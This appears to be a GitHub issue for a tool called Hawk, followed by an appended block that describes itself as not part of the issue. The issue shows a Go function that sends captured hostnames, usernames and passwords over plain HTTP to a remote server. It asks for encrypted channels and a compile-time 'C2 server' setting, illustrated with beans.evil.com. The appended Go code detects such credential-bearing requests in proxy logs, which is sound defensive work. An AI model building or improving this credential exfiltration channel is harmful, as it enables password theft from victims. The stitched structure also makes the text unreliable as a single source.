Improve Backchannel For Sending Creds #5

Open
Pascal-0x90 opened this issue Apr 1, 2024 · 0 comments
Labels: enhancement (New feature or request), help wanted (Extra attention is needed)

What is the Issue?

The back-channel below uses HTTP and has the URL in a weirdly configurable place. This could be improved by giving the option to use HTTP and HTTPS communications (or any other TLS-wrapped encryption like mTLS).

Hawk/main.go

Lines 58 to 71 in 49c2b25

func exfilPassword(username, password string) {
	hostname, err := os.Hostname()
	if err != nil {
		return
	}
	serverURL := "http://FILL:6969/"
	values := url.Values{}
	values.Set("hostname", hostname)
	values.Set("username", username)
	values.Set("password", password)
	fullURL := fmt.Sprintf("%s?%s", serverURL, values.Encode())
	//fmt.Printf("Sending to %s\n", fullURL)
	http.Get(fullURL)
}

Then the option to configure the back-channel server at compile time using a compiler argument would be nice, or at least have it as a constant at the top of some file so the user does not need to dig into the code to change the server/host information.

Proposed Solution

Implement a layer to decide the channel of communication:

  • HTTP
  • HTTPS
  • mTLS

Implement a compile-time decision for those using a switch case.

Compile-time definition of the C2 server IP address.

Much of this could be done in one of two ways:

go build -ldflags "-X main.c2server=http://beans.evil.com:1337"
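
From the defender's side, the request shape in the excerpt above is recognizable in proxy or web-server logs: a single GET whose query string carries `hostname`, `username` and `password` together. The following Go detection is an added example, not part of the issue or the Hawk project; the log line layout, the `Finding` type and the `.example` hosts are assumptions constructed for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// credKeys are the query parameters set by the exfilPassword excerpt in the issue.
var credKeys = []string{"hostname", "username", "password"}

// Finding records who talked to whom; captured values are never copied into it.
type Finding struct{ Client, Dest string; Cleartext bool }

// inspect flags a GET whose query string carries all three credKeys.
func inspect(client, method, rawURL string) (Finding, bool) {
	u, err := url.Parse(rawURL)
	if err != nil || method != "GET" {
		return Finding{}, false
	}
	q := u.Query()
	for _, k := range credKeys {
		if _, ok := q[k]; !ok {
			return Finding{}, false
		}
	}
	return Finding{Client: client, Dest: u.Host, Cleartext: u.Scheme == "http"}, true
}

// scan reads lines of the assumed form "<client-ip> <method> <url>".
func scan(log string) []Finding {
	var out []Finding
	for _, line := range strings.Split(log, "\n") {
		if f := strings.Fields(line); len(f) == 3 {
			if hit, ok := inspect(f[0], f[1], f[2]); ok {
				out = append(out, hit)
			}
		}
	}
	return out
}

// sampleLog is constructed for this example; hosts are reserved .example names.
const sampleLog = `10.0.0.5 GET http://intranet.example/search?q=password+policy
10.0.0.7 GET http://collector.example:6969/?hostname=web01&password=REDACTED&username=alice
10.0.0.7 GET https://collector.example/?hostname=web01&password=REDACTED&username=bob`

func main() {
	fmt.Printf("%+v\n", scan(sampleLog))
}
```

The check depends on the monitoring point seeing the full URL, so the HTTPS entry in the sample assumes a TLS-inspecting proxy.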